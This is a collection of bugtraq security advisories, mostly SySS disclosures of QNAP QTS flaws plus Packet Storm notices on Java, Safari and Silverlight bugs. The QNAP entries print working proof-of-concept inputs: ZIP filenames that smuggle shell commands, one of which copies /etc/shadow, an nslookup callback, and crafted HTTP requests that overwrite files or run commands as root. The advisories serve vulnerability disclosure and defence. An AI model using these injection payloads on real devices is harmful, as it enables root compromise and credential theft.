UJVCkAiAoICJf8Cei6jrIDN/LjvHHWtw2R7AFw0Eic3CQjkdWFqAHOEV6s7CNQjD
Rrr3za7BPN6CUe098BDbnXhmIFu4T2ZbJ+88jPMXHUv5NcvZ7SwSIE++uYQ0FmI=
=LzeJ
-END PGP SIGNATURE-

[SYSS-2016-048] QNAP QTS - OS Command Injection

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-048
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.0 Build 20160311 and Build 20160601
Tested Version(s): 4.2.0 Build 20160311 - 4.2.2 Build 20160812
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: unfixed
Manufacturer Notification: 2016-06-03
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices (see [1]).



Vulnerability Details:


The SySS GmbH found an os command injection in the file station of the
current QTS administrative interface.

This type of vulnerability allows an attacker to run arbitrary commands
on the operating system of the host as root.



Proof of Concept (PoC, Build 20160311)

1. Log in to the QNAP. The user needs sufficient permissions to either
rename or create ZIP files.
2. Upload or create a ZIP file with the following name:

a;echo -e "cp \x2fetc\x2fshadow \x2fshare\x2fCACHEDEV1_DATA\x2f[current
dir]" | bash ; echo .zip

3. Right-click on the ZIP file and select Extract > Extract to 
[pre-selected directory with the name of the ZIP file]
(Extract > last entry)

4. The contained code will be exected, in this case: /etc/shadow copied
to the current directory. Other code can of course be run as well,
e.g. to display some strings on the front-display of the QNAP (tested
with a 470 Pro) name the ZIP file like this and extract it:

a;lcd_tool -1 PoC -2 OS-Command-Injection; echo .zip

Depending on the system this might not work out of the box.




Proof of Concept (PoC, Build 20160601)

1. Log in to the QNAP. The user needs sufficient permissions to either
rename or create ZIP files.
2. Upload or create a ZIP file with the following name:

test$(nslookup examplehost).zip

3. Right-click on the ZIP file and select Extract > Extract files

4. The contained code will be executed as can be confirmed by listening 
on the corresponding network.

The original exploit (Extract > last entry) will not work on the current
release of QTS. This exploit should work on previous versions of QTS as
well.




Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only 
trusted users/administrators have access to the device.



Disclosure Timeline:

2016-06-03: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-06-22: Report updated to adress (minor) changes in build 20160601
2016-07-06: Updated report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-048

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-048.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/




Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.nerz-at-syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWViAAoJENEtJqSRgP2yhjUIALi90iAlcbMaJuDlxw5myP22
ULuhqRRCsqS6kR5gVrUA7eJSRHYDubXF1PlW9SoYt3bdTfRyhb1Pwf71yGggmZ+M
eCS6ImGIwKvEoJNkXsWLSV9p2hd/ha/GgTPwEa0wwUJYvuBJfadthH71WlKi7e5u
68RYX3L/IO2wylkTa6L0MJU4le48EpZOZxgcuJIXTo5qt/nDDApKS3h1W3EqNAo7

[SYSS-2016-050] QNAP QTS - Persistent Cross-Site Scripting

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-050
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.0 Build 20160311 and Build 20160601
Tested Version(s): 4.2.0 Build 20160311 - 4.2.2 Build 20160812
Vulnerability Type: Persistent Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: unfixed
Manufacturer Notification: 2016-06-03
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices (see [1]).



Vulnerability Details:

The SySS GmbH found a persistent/stored cross-site scripting
vulnerability in the file viewer component of the QTS administrative
interface.

This type of vulnerability allows an attacker to store active content
like JavaScript on the system, executing the code in the browser of
visitors viewing the affected page. The code can then be used to e.g.
execute commands in the scope of the user, infect the users browser and
so on.



Proof of Concept (PoC):


1. Log in to the QNAP. The user needs sufficient permissions to create
ZIP files.
2. Right-click on a file or directory and select "compress(ZIP)"
3. In the newly opened window, enter a name containing HTML codes like
blabla
and press OK
4. The code is being executed directly after creating the ZIP.
5. Right-click on the ZIP-file and hover over 'Extract".
Again, the code is being executed.



Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only 
trusted users/administrators have the neccessary permissions to create 
or rename directories.



Disclosure Timeline:

2016-06-03: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-06-22: Vulnerability report updated to fix error in "hover over" 
description.
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-050

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-050.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.n...@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVlAAoJENEtJqSRgP2yicQH/RVeQNcb3qhDUiLlfRMKmV//
Fxt52iVXKai0QiWN6GqBOIU0qon4xXvWyiwJckox5QMXJWELi4PPNoyPxfipCp0M
Q8jIbm1KbxMt2SAwUUG1fFY1Dvj8/dWt81S/HLWj131M7QParwFhLjiBoFNnerLM
49QSWe4jYonIUbqINqIIEJ1lp3hbHDTBOOlXHQahpxsUvphBsJBKfEJImERJ9vGT
VhJam8WJwwKjxsLRDxUiUiL2waLAhdbi2HeJiZy1CplwRvDst2yA5zdDG5iz5O3G
zcByMMyk5ZfRATGPYTH6tuEx2SWtFVFIIXPL8FtWi/7vKn2pITcj9vADFvANxSM=
=xxMF
-END PGP SIGNATURE-

[SYSS-2016-048] QNAP QTS - OS Command Injection

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-048
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.0 Build 20160311 and Build 20160601
Tested Version(s): 4.2.0 Build 20160311 - 4.2.2 Build 20160812
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: unfixed
Manufacturer Notification: 2016-06-03
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices (see [1]).



Vulnerability Details:


The SySS GmbH found an os command injection in the file station of the
current QTS administrative interface.

This type of vulnerability allows an attacker to run arbitrary commands
on the operating system of the host as root.



Proof of Concept (PoC, Build 20160311)

1. Log in to the QNAP. The user needs sufficient permissions to either
rename or create ZIP files.
2. Upload or create a ZIP file with the following name:

a;echo -e "cp \x2fetc\x2fshadow \x2fshare\x2fCACHEDEV1_DATA\x2f[current
dir]" | bash ; echo .zip

3. Right-click on the ZIP file and select Extract > Extract to 
[pre-selected directory with the name of the ZIP file]
(Extract > last entry)

4. The contained code will be exected, in this case: /etc/shadow copied
to the current directory. Other code can of course be run as well,
e.g. to display some strings on the front-display of the QNAP (tested
with a 470 Pro) name the ZIP file like this and extract it:

a;lcd_tool -1 PoC -2 OS-Command-Injection; echo .zip

Depending on the system this might not work out of the box.




Proof of Concept (PoC, Build 20160601)

1. Log in to the QNAP. The user needs sufficient permissions to either
rename or create ZIP files.
2. Upload or create a ZIP file with the following name:

test$(nslookup examplehost).zip

3. Right-click on the ZIP file and select Extract > Extract files

4. The contained code will be executed as can be confirmed by listening 
on the corresponding network.

The original exploit (Extract > last entry) will not work on the current
release of QTS. This exploit should work on previous versions of QTS as
well.




Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only 
trusted users/administrators have access to the device.



Disclosure Timeline:

2016-06-03: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-06-22: Report updated to adress (minor) changes in build 20160601
2016-07-06: Updated report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-048

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-048.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/




Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.nerz-at-syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWViAAoJENEtJqSRgP2yhjUIALi90iAlcbMaJuDlxw5myP22
ULuhqRRCsqS6kR5gVrUA7eJSRHYDubXF1PlW9SoYt3bdTfRyhb1Pwf71yGggmZ+M
eCS6ImGIwKvEoJNkXsWLSV9p2hd/ha/GgTPwEa0wwUJYvuBJfadthH71WlKi7e5u
68RYX3L/IO2wylkTa6L0MJU4le48EpZOZxgcuJIXTo5qt/nDDApKS3h1W3EqNAo7

[SYSS-2016-053] QNAP QTS - Arbitrary File Overwrite

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-053
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.1 Build 20160601
Tested Version(s): 4.2.1 Build 20160601 - 4.2.2 Build 20160812
Vulnerability Type: Arbitrary file overwrite (CWE-23)
Risk Level: High
Solution Status: unfixed
Manufacturer Notification: 2016-06-06
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices[1].



Vulnerability Details:


The SySS GmbH found an vulnerability in the user configuration interface
of the QTS management webapplication, allowing an authenticated user to
overwrite arbitrary files in /tmp and its subdirectories.



Proof of Concept (PoC):

1. Log in to the QNAP. The user needs no special privileges.
2. Run a request like the following:

==
POST 
/cgi-bin/userConfig.cgi?imbgName=[newNameToOverwrite]=uploadBgImg=[sid]
 HTTP/1.1
Host: [IP of the QNAP]:8080
Content-Type: multipart/form-data;boundary=foo
Content-Length: 115

foo
Content-Disposition: form-data; name="filename"; filename="foo.txt"
Content-Type: non-image-jpeg

asdf
foo--

==
3. The uploaded file will be written to /tmp/[newNameToOverwrite] allowing 
overwriting e.g. crontabs, PID-files and similar files.




Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only 
trusted users/administrators have access to the QNAP or the required
permissions to update their profile.



Disclosure Timeline:

2016-06-06: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-053

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-053.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.n...@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVnAAoJENEtJqSRgP2yJOsIAIK6uglJJlCsfk4ZQR/3b0UH
A1MAMDS4EMrW6+4CX5SS+69KHYpXYCGf4jvniEiFtMYyBrkVTVB1DdxWZXAsSVR4
TI/xeWL2ltp1Kjt5uWiDZ41haoeuHCqWd0wB4+L3pQnOqtGi+THMBTt7s0dF3bPX
x0r0qiDmDRR/CikePvw06igwEAJl3+1AxvawHhqCqAkNLQaCT4nzjheYqGhQxXmJ
WWi1kKfWLDc684sjCf0kl0Cldzqw+dw2yx7aa/gderWxI/VwMYO7mZwGcvHQjqSq
MTKH6tbMJ9agLoU2fzJCnk/d5QHk52Rtxu0DPjUl2/7CpFaxyhFE3R/0AKn6Wyw=
=MtKH
-END PGP SIGNATURE-

[SYSS-2016-052] QNAP QTS - OS Command Injection

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-052
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.1 Build 20160601
Tested Version(s): 4.2.1 Build 20160601 - 4.2.2 Build 20160812
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: unfixed
Manufacturer Notification: 2016-06-06
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices[1].



Vulnerability Details:


The SySS GmbH found an os command injection in the userConfig plugin of 
the current QTS administrative interface.

This type of vulnerability allows an attacker to run arbitrary commands
on the operating system of the host as root.



Proof of Concept (PoC):

1. Log in to the QNAP. The user needs no special privileges.
2. Run a request like the following:

==
POST 
/cgi-bin/userConfig.cgi?imbgName=a$([command]).jpg=uploadBgImg=[sid] 
HTTP/1.1
Host: [IP of the QNAP]:8080
Content-Type: multipart/form-data;boundary=foo
Content-Length: 115

foo
Content-Disposition: form-data; name="filename"; filename="foo.jpg"
Content-Type: image/jpeg

asdf
foo--

==
3. The contained command will be exeucted. An example would be

  $(bash -c '(echo;ls) 1>&2')

complete URL:

  
/cgi-bin/userConfig.cgi?imbgName=a$(bash%20-c%20'(echo;ls)%201>%262')Img.jpg=uploadBgImg=[sid]

which will display the content of the current working directory 
(/home/httpd/cgi-bin) as content.




Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only 
trusted users/administrators have access to the device.



Disclosure Timeline:

2016-06-06: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-052

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-052.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.n...@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVnAAoJENEtJqSRgP2ydicIAINK2g0OkT3PDOVzIz4tQKOL
0oz4npiC8V3PJOSG7bucwMY9J/HQBM8xuCQy6n+7NHMyEYeTOJEDv/RYYl93V4hU
AvbQSDnQHGU3oS81jv5liLGbuRwwP0eemsjSauVoKBlRa3Aj5x0FBDkfmPVlxi+0
HBtNDKFZtd8zqPBwbtvpFvVM4Dk5NkmSdJLGNd9U3/OvNGyX7bUT0ajWli8uNLC9
IUR+4ppnHNlJt1VEX3nvOXEHjRucT5Pe9vwE17bDyj76y4zbuGb8XBTPiajNNrxU
zshJRRdhdpZnVCG4+1l8D196bzNP3gFnmfstF9IqnNHxICUqyw0cK//4HFDgGRM=
=qQT0
-END PGP SIGNATURE-

[CVE-2016-1926] XSS in Greenbone Security Assistant 6.0.0 and < 6.0.8

[bugtraq]

Hello, 

Vulnerability information
===
Date: 13th January 2016
Product: Greenbone Security Assistant  6.0.0 and < 6.0.8
Vendor: OpenVAS 
Risk: Low, CVSS 1.9 (AV:A/AC:M/Au:M/C:P/I:N/A:N) 

Description
===
It has been identified that Greenbone Security Assistant (GSA) is vulnerable to 
cross site scripting due to a improper handling of the parameters of the 
get_aggregate command. Given the attacker has access to a session token of the 
browser session, the cross site scripting can be executed. OpenVAS-7 is not 
affected. 

Fix
===
OpenVAS recommends that the publicly available patches are applied. If building 
from source, then patches r24056 (for Greenbone Security Assistant 6.0.x of 
OpenVAS-8) should be obtained from the OpenVAS SVN repository. For trunk (beta 
status of OpenVAS-9) this was solved with r24055.

A fresh tarball containing the latest stable release of Greenbone Security 
Assistant 6.0 (OpenVAS-8) can be obtained from:


http://wald.intevation.org/frs/download.php/2283/greenbone-security-assistant-6.0.8.tar.gz

In the event that OpenVAS has been supplied as part of a distribution then the 
vendor or organisation concerned should be contacted for a patch. 

Full advisory
===
See [1].

Timeline
===
- 07.01.2016: XSS discovered and reported to vendor.
- 08.01.2016, 08:00: Acknowledgement from vendor and info that fix is already 
in progress.
- 08.01.2016, 17:30: Fix ready, QA and testing needed
- 09.01.2016: Update released for Greenbone Security Manager: Advisory GBSA 
2016-01 [2]
- 13.01.2016: Update released OpenVAS: Advisory OVSA 20160113 [1]
- 18.01.2016: CVE-2016-1926 assigned by MITRE
- 20.01.2016: Blogpost released [3]

References
===
- [1] http://www.openvas.org/OVSA20160113.html
- [2] http://www.greenbone.net/technology/gbsa2016-01.html
- [3] 
https://en.internetwache.org/cve-2016-1926-xss-in-the-greenbone-security-assistant-20-01-2016/

Regards,
Sebastian Neef

[PSA-2013-1022-1] Microsoft Silverlight Invalid Typecast / Memory Disclosure

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

+--+
| Packet Storm Advisory 2013-1022-1|
| http://packetstormsecurity.com/  |
+--+
| Title: Microsoft Silverlight Invalid Typecast / Memory Disclosure|
++-+
| Release Date   | 2013/10/22  |
| Advisory Contact   | Packet Storm (advisor...@packetstormsecurity.com)   |
| Researcher | Vitaliy Toropov |
++-+
| System Affected| Microsoft Silverlight   |
| Versions Affected  | Prior to 5.1.20125.0 (MS13-022) |
|| Prior to 5.1.20913.0 (MS13-087) |
| Related Advisory   | MS13-022 / MS13-087 |
| Related CVE Number | CVE-2013-0074 / CVE-2013-3896   |
| Vendor Patched | 2013/03/12 / 2013/10/08 |
| Classification | 1-day   |
++-+

+--+
| OVERVIEW |
+--+

The release of this advisory provides exploitation details in relation to 
known patched vulnerabilities in Microsoft Silverlight.   These details were 
obtained through the Packet Storm Bug Bounty program and are being released 
to the community.

+--+

+-+
| DETAILS |
+-+

A memory disclosure vulnerability exists in the public WriteableBitmap class
from System.Windows.dll. This class allows reading of image pixels from the 
user-defined data stream via the public SetSource() method.

BitmapSource.ReadStream() allocates and returns byte array and a count of array
items as out parameters. These returned values are taken from the input stream
and they can be fully controlled by the untrusted code. When returned count 
is greater than array.Length, then data outside the array are used as input 
stream data by the native BitmapSource_SetSource() from agcore.dll. Later all 
data can be viewed via the public WriteableBitmap.Pixels[] property.


+--+

+--+
| PROOF OF CONCEPT |
+--+

The full exploit code demonstrating code execution is available here:
http://packetstormsecurity.com/files/123731/

+--+

+---+
| RELATED LINKS |
+---+

http://technet.microsoft.com/en-us/security/bulletin/ms13-022
http://technet.microsoft.com/en-us/security/bulletin/ms13-087

+--+


++
| SHAMELESS PLUG |
++

The Packet Storm Bug Bounty program gives researchers the ability to profit 
from their discoveries.  You can get paid thousands of dollars for one day 
and zero day exploits.  Get involved by contacting us at 
getp...@packetstormsecurity.com or visit the bug bounty page at: 

http://packetstormsecurity.com/bugbounty/





-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.14 (GNU/Linux)

iEYEARECAAYFAlJnHfEACgkQrM7A8W0gTbFKPACdGSp3GhRyvUjEzrNnlNejkGt+
pzQAoIeywymRBuPYbO9+OVGT59miZKuC
=1UST
-END PGP SIGNATURE-

[PSA-2013-0903-1] Apple Safari Heap Buffer Overflow

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

+--+
| Packet Storm Advisory 2013-0903-1|
| http://packetstormsecurity.com/  |
+--+
| Title: Apple Safari Heap Buffer Overflow |
++-+
| Release Date   | 2013/09/03  |
| Advisory Contact   | Packet Storm (advisor...@packetstormsecurity.com)   |
| Researcher | Vitaliy Toropov |
++-+
| System Affected| Apple Safari|
| Versions Affected  | 6.0.1 for iOS 6.0 and OS X 10.7/8, possibly earlier |
| Related Advisory   | APPLE-SA-2012-11-01-2   |
| Related CVE Number | CVE-2012-3748   |
| Vendor Patched | 2012/11/01  |
| Classification | 1-day   |
++-+

+--+
| OVERVIEW |
+--+

The release of this advisory provides exploitation details in relation to a 
known patched vulnerability in Apple Safari.   These details were obtained 
through the Packet Storm Bug Bounty program and are being released to the 
community.

+--+

+-+
| DETAILS |
+-+

The heap memory buffer overflow vulnerability exists within the WebKit's 
JavaScriptCore JSArray::sort(...) method.  This method accepts the user-defined 
JavaScript function and calls it from the native code to compare array items. 
If this compare function reduces array length, then the trailing array items 
will be written outside the m_storage-m_vector[] buffer, which leads to the 
heap memory corruption.

The exploit for this vulnerability is a JavaScript code which shows how to 
use it for memory corruption of internal JS objects (Unit32Array and etc.) 
and subsequent arbitrary code execution (custom ARM/x64 payloads can be pasted 
into the JS code).

+--+

+--+
| PROOF OF CONCEPT |
+--+

The full exploit code is available here:
http://packetstormsecurity.com/files/123088/

+--+

+---+
| RELATED LINKS |
+---+

http://lists.apple.com/archives/security-announce/2012/Nov/msg1.html
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3748

+--+


++
| SHAMELESS PLUG |
++

The Packet Storm Bug Bounty program gives researchers the ability to profit 
from their discoveries.  You can get paid thousands of dollars for one day 
and zero day exploits.  Get involved by contacting us at 
getp...@packetstormsecurity.com or visit the bug bounty page at: 

http://packetstormsecurity.com/bugbounty/


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.14 (GNU/Linux)

iEYEARECAAYFAlImrisACgkQrM7A8W0gTbHnIwCfR6vCe/+YjbxYoeHaErbHYDsN
bC0An34R0Am9RemKiIDnoa+hD3pT+M0y
=VXyD
-END PGP SIGNATURE-

[PSA-2013-0819-1] Oracle Java BytePackedRaster.verify() Signed Integer Overflow

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

+--+
| Packet Storm Advisory 2013-0819-1|
| http://packetstormsecurity.com/  |
+--+
| Title: Oracle Java BytePackedRaster.verify() Signed Integer Overflow |
++-+
| Release Date   | 2013/08/19  |
| Advisory Contact   | Packet Storm (advisor...@packetstormsecurity.com)   |
| Researcher | Name Withheld   |
++-+
| System Affected| Oracle Java |
| Versions Affected  | Prior to 7u25   |
| Vendor Patched | 2013/06/18  |
| Classification | 0-day   |
++-+

+--+
| OVERVIEW |
+--+

The release of this advisory provides exploitation details in relation to a 
known patched vulnerability in Oracle Java.   These details were obtained 
through the Packet Storm Bug Bounty program and are being released to the 
community.

+--+

+-+
| DETAILS |
+-+

The BytePackedRaster.verify()  method in Oracle Java versions prior to 7u25 
is vulnerable to a signed integer overflow that allows bypassing of
dataBitOffset boundary checks.  This vulnerability allows for remote code 
execution.  User interaction is required for this exploit in that the target 
must visit a malicious page or open a malicious file.

+--+

+--+
| PROOF OF CONCEPT |
+--+

The full exploit code that pops calc.exe is available here:
http://packetstormsecurity.com/files/122865/

+--+

+---+
| RELATED LINKS |
+---+

http://www.oracle.com/technetwork/java/javase/7u25-relnotes-1955741.html

+--+


++
| SHAMELESS PLUG |
++

The Packet Storm Bug Bounty program gives researchers the ability to profit 
from their discoveries.  You can get paid thousands of dollars for one day 
and zero day exploits.  Get involved by contacting us at 
getp...@packetstormsecurity.com or visit the bug bounty page at: 

http://packetstormsecurity.com/bugbounty/




-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.14 (GNU/Linux)

iEYEARECAAYFAlISqa4ACgkQrM7A8W0gTbG7lwCgrha8ukKjfCtKnsKEPZ5uMRSO
JAEAnjybqCvr9Xcu28TkXcFauIFx6FSq
=H4uL
-END PGP SIGNATURE-

[PSA-2013-0813-1] Oracle Java IntegerInterleavedRaster.verify() Signed Integer Overflow

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

+--+
| Packet Storm Advisory 2013-0813-1|
| http://packetstormsecurity.com/  |
+--+
| Title: Oracle Java IntegerInterleavedRaster.verify() Signed Integer Overflow |
++-+
| Release Date   | 2013/08/13  |
| Advisory Contact   | Packet Storm (advisor...@packetstormsecurity.com)   |
| Researcher | Name Withheld   |
++-+
| System Affected| Oracle Java |
| Versions Affected  | Prior to 7u25   |
| Vendor Patched | 2013/06/18  |
| Classification | 0-day   |
++-+

+--+
| OVERVIEW |
+--+

The release of this advisory provides exploitation details in relation to a 
known patched vulnerability in Oracle Java.   These details were obtained 
through the Packet Storm Bug Bounty program and are being released to the 
community.

+--+

+-+
| DETAILS |
+-+

The IntegerInterleavedRaster.verify() method in Oracle Java versions prior 
to 7u25 is vulnerable to a signed integer overflow that allows bypassing of
dataOffsets[0] boundary checks.  This vulnerability allows for remote code 
execution.  User interaction is required for this exploit in that the target 
must visit a malicious page or open a malicious file.

+--+

+--+
| PROOF OF CONCEPT |
+--+

The full exploit code that pops calc.exe is available here:

http://packetstormsecurity.com/files/122806/


+--+

+---+
| RELATED LINKS |
+---+

http://www.oracle.com/technetwork/java/javase/7u25-relnotes-1955741.html


+--+


++
| SHAMELESS PLUG |
++

The Packet Storm Bug Bounty program gives researchers the ability to profit 
from their discoveries.  You can get paid thousands of dollars for one day 
and zero day exploits.  Get involved by contacting us at 
getp...@packetstormsecurity.com or visit the bug bounty page at: 

http://packetstormsecurity.com/bugbounty/



-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.14 (GNU/Linux)

iEYEARECAAYFAlIK8WoACgkQrM7A8W0gTbHW1wCeIFzW+TgACSx3aFAPzvQ/Hv+T
If4AoLycXdngGuDvAafMC2PBOquU9Opc
=GNYG
-END PGP SIGNATURE-

[PSA-2013-0811-1] Oracle Java storeImageArray() Invalid Array Indexing

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

+--+
| Packet Storm Advisory 2013-0811-1|
| http://packetstormsecurity.com/  |
+--+
| Title: Oracle Java storeImageArray() Invalid Array Indexing  |
++-+
| Release Date   | 2013/08/11  |
| Advisory Contact   | Packet Storm (advisor...@packetstormsecurity.com)   |
| Researcher | Name Withheld   |
++-+
| System Affected| Oracle Java |
| Versions Affected  | Prior to 7u25   |
| Vendor Patched | 2013/06/18  |
| Classification | 0-day   |
++-+

+--+
| OVERVIEW |
+--+

The release of this advisory provides exploitation details in relation to a 
known patched vulnerability in Oracle Java.   These details were obtained 
through the Packet Storm Bug Bounty program and are being released to the 
community.

+--+

